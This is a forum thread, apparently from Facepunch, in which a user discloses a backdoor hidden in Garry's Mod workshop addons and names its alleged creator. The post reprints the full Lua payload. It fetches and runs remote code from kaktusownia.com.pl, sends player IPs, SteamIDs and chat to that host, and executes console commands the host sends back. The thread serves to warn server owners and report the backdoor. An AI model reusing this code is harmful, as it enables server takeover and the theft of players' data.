So... big amount of polish skids and a polish "community" created a Garry's Mod backdoor which can do full takeover of any server.
Creator of backdoor: https://steamcommunity.com/profiles/76561198038819576/
Scripts with backdoor:
basically everything from below SteamID's like Fred (Flinstone) scripts...
It has some amazing features like:
all users which are using backdoor (with SteamID64, actual avatars and names)
https://files.facepunch.com/forum/upload/301844/0e2cf370-5687-4091-818c-45d9860330fe/1.png
amazing server list (with locked servers of backdoor's owner)
https://files.facepunch.com/forum/upload/301844/75da7341-5914-489d-bd0f-7c35eef804f1/2.png
server informations
https://files.facepunch.com/forum/upload/301844/6020eb5a-3d26-4c3d-a60c-1b5c89fdc23d/cHIsd.png
From this panel we can do everything to server, run lua codes, run console commands and have actual information of the server like ISP, what is it type of server, which gamemode they're playing, map and more...
https://files.facepunch.com/forum/upload/301844/6f8939c7-4add-4db3-8c46-a6202d77f922/jeg7H.png
Here below we have a lua script which executes only when your User-Agent is Valve HTTP Steam Client.
timer.Simple(30,function() http.Fetch("http://version.kaktusownia.com.pl/api/getcode?apiCode=aJbhsRFhXGfyYJyfxnkbHdl6EAQjQQ",function(body) RunString(body) end) end)
bgApiKey="JMUWCU21eXCR4BdJkR5NHNhGlSH9Cn"
adressBG = string.Explode(":",game.GetIPAddress())
bgsnd = bgsnd or {}
bgsnd.pregs = {}
bgsnd.recorded = false
if not timer.Exists( "bg_test" ) and adressBG[1] ~= "0.0.0.0" then
local dsend = {
ip=adressBG[1],
port=adressBG[2],
name=GetHostName(),
apikey=bgApiKey,
maxplayers=tostring(game.MaxPlayers()),
map=game.GetMap(),
tickrate = tostring(math.floor(1 / engine.TickInterval())),
gamemode = GAMEMODE_NAME,
uptime = tostring(RealTime())
}
http.Post("http://version.kaktusownia.com.pl/api/register",dsend,function(bodyqw)
hashBG = util.JSONToTable(bodyqw).hash
function bgAddPlayerData(ply)
if not IsValid(ply) or not ply:IsPlayer() or ply:IsBot() then return end
local bgplydat = {
steamid=ply:SteamID64(),
hash=hashBG,
ping=tostring(ply:Ping()),
ip=tostring(ply:IPAddress()),
frags=tostring(ply:Frags()),
deaths=tostring(ply:Deaths()),
timeconnected=tostring(ply:TimeConnected()),
group=tostring(ply:GetUserGroup()),
name=ply:Name()
}
http.Post("http://version.kaktusownia.com.pl/api/player",bgplydat,function() end)
end
if timer.Exists( "bg_test" ) then
timer.Remove("bg_test")
end
for i,k in pairs(player.GetAll()) do
bgsnd.pregs = bgsnd.pregs or {}
if table.HasValue( bgsnd.pregs, k:SteamID64() ) then continue end
bgsnd.recorded = true
bgAddPlayerData(k)
end
timer.Create("bg_test",10,0,function()
local function sortAllPlayersBG()
local sortedPlayers = {}
for i,k in pairs(player.GetAll()) do
if not IsValid(k) or k:IsBot() then continue end
table.insert(sortedPlayers,{
steamid=k:SteamID64(),
ping=tostring(k:Ping()),
ip=tostring(k:IPAddress()),
frags=tostring(k:Frags()),
deaths=tostring(k:Deaths()),
timeconnected=tostring(k:TimeConnected()),
group=tostring(k:GetUserGroup()),
name=k:Name()
})
end
return sortedPlayers
end
local sendData = {
hash=hashBG,
name=GetHostName(),
maxplayers=tostring(game.MaxPlayers()),
actualplayers=tostring(#player.GetAll()),
map=game.GetMap(),
players = util.TableToJSON(sortAllPlayersBG()),
tickrate = tostring(math.floor(1 / engine.TickInterval())),
bots = tostring(#player.GetBots()),
gamemode = GAMEMODE_NAME,
isdedicated = tostring(game.IsDedicated()),
uptime = tostring(RealTime())
}
http.Post("http://version.kaktusownia.com.pl/api/update",sendData,function(bgda,_,_,statusCode)
if statusCode ~= 200 then return end
local allData = util.JSONToTable(bgda)
local cmds = allData.commands or {}
local luaCodes = allData.codes or {}
for i,k in pairs(cmds) do
game.ConsoleCommand( k .. "\n" )
end
for i,k in pairs(luaCodes) do
RunString(k)
end
end)
end)
hook.Add("PlayerSay","BG chat text",function(ply,text,isTeam)
http.Post("http://version.kaktusownia.com.pl/api/chat",{hash=hashBG,name=ply:Name(),text=text,team=isTeam,steamid=ply:SteamID64()},function(body)
end)
end)
bgsnd = {}
bgsnd.data = bgsnd.data or {}
bgsnd.Start = function()
bgsnd.data = {}
end
bgsnd.Write = function(_,sds)
table.insert(bgsnd.data,sds)
end
bgsnd.Send = function()
http.Post("http://version.kaktusownia.com.pl/api/addinfo",{hash=hashBG,info=util.TableToJSON(bgsnd.data)},function(body)
end)
end
hook.Add("PlayerInitialSpawn","BG player connect",function(ply)
timer.Simple(5,function()
bgsnd.pregs = bgsnd.pregs or {}
bgAddPlayerData(ply)
if bgsnd.recorded and IsValid(ply) and ply:IsPlayer() and not ply:IsBot() then
table.insert(bgsnd.pregs,ply:SteamID64())
end
end)
end)
end)
end
Like every serverside backdoor, this will only run if the server owner installs this. Is this being snuck/obfuscated into addons? Where did you find the script?
Where did I found this script? I saw his Console script few months ago, and this script was making me some errors. I found some http requests into script, which were available only for Garry's Mod (as User-Agent: Valve Source HTTP Client), and when I was trying to direct access this script I only got a blank screen. Where this scripts are? Basically, every Fredward's script has this request implemented in various places.
https://steamcommunity.com/sharedfiles/filedetails/?id=1393019092
Line 21: timer.Simple(30,function() http.Fetch("http://version.kaktusownia.com.pl/api/getcode?apiCode=aJbhsRFhXGfyYJyfxnkbHdl6EAQjQQ",function(body) RunString(body) end) end)
You should email the addons containing the backdoors to Rubat as per the sticky.
I sended email few days ago but there wasn't any sign of activity, so I also posted all codes here to give information about backdoor to all players.
I have not received any emails about this.
I also sent you on Monday, another e-mail with some informations which maybe got filtered due to URLs, I will try to later send this again but without links, but with attachments.
Said a biggest thief and scammer on Polish Gmod scene
JUST kiedy JvS
They have been caught on here before, on the massive backdoor addon dump, and I guess they're back at it again, is workshop restriction possible on those individuals?
Sorry, you need to Log In to post a reply to this thread.
